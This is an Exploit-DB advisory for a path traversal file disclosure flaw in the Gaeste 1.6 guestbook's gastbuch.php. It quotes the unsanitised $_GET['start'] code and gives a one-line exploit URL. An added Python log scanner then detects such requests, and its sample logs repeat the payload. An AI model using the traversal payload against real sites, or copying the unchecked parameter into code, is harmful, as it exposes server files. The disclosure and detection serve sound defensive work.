- 18 Dec 2022
- EDB-ID: 8027
- EDB verification: Passed
- Author: BD0RK
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: CVE-2009-5093
- Publication date: 2009-02-09
Code:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
+ +
+ bd0rk || SOH-Crew +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
=> Vendor: http://www.php4scripte.de/
=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip
=> Bugfound3R: bd0rk
=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)
=> Vulnerable Code in gastbuch.php line 2-3
-------------------------------
if (isset($_GET['start'])) {
$start=$_GET['start'];
-------------------------------
[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php
###The 20 years old, german Hacker bd0rk###
# milw0rm.com [2009-02-09]
- Source: www.exploit-db.com
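A log check for the request shape shown in the advisory, as an added example that is not part of the original post: it scans web-server access logs for requests to gastbuch.php whose `start` parameter decodes to a path-like value. The log lines are constructed, and the combined log format, the function names and the rule that a legitimate `start` never contains path characters are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (combined log format assumed), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [09/Feb/2009:10:00:01 +0000] "GET /gb/gastbuch.php?start=10 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [09/Feb/2009:10:02:13 +0000] "GET /gb/gastbuch.php?start=../../TARGETFILE.php HTTP/1.1" 200 812 "-" "-"
192.0.2.44 - - [09/Feb/2009:10:02:20 +0000] "GET /gb/gastbuch.php?start=..%2F..%2FTARGETFILE.php HTTP/1.1" 404 120 "-" "-"
192.0.2.10 - - [09/Feb/2009:10:03:00 +0000] "GET /gb/index.php?start=../x HTTP/1.1" 404 120 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
# Assumption: a legitimate 'start' value never contains dot-dot sequences,
# path separators or NUL bytes.
PATHLIKE_RE = re.compile(r'\.\.|[/\\]|\x00')


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so nested encodings are normalized."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_start_requests(log_text, script="gastbuch.php"):
    """Return (client_ip, decoded_start, status) for path-like 'start' values."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        ip, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/" + script):
            continue
        # parse_qsl decodes once; fully_decode handles any remaining layers.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if key == "start" and PATHLIKE_RE.search(value):
                hits.append((ip, value, int(status)))
    return hits


if __name__ == "__main__":
    for ip, value, status in suspicious_start_requests(SAMPLE_LOG):
        print(f"{ip} start={value!r} status={status}")
```

The returned status code helps triage: a 200 on a flagged request deserves a closer look at what the response contained than a 404 does.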